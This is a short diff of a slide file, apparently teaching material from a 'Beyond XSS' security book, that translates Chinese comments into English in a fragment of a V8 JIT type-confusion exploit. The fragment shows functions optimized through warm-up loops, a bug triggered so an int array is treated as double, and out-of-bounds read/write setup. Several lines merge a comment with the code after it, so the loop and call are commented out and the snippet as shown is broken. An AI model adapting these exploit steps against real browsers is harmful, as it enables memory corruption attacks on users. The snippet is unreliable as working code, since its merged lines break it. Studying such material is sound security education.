linyawun/Beyond-XSS-Book-slide-Ch1/slides.md

 x[0] = 1.1;

-// 讓 V8 去最佳化 oobRead 這函式
+// Optimize oobRead function in V8
-// 此時 V8 認為 oobRead 裡面的 x 一定是 double 型別 for (let i = 0; i < 20000; i++) {
+// At this point, V8 assumes that x in oobRead is always of type double for (let i = 0; i < 20000; i++) {
 oobRead();
 }

-// 讓 V8 去最佳化 oobWrite 這函式
+// Optimize oobWrite function in V8
 for (let i = 0; i < 20000; i++) oobWrite(1.1);

-// 利用漏洞讓 x 變回 int，但 V8 仍認為 x 是 double foo(arr);
+// Exploit the bug, making x an int array, but V8 still assumes x is double foo(arr);

 var view = new ArrayBuffer(24);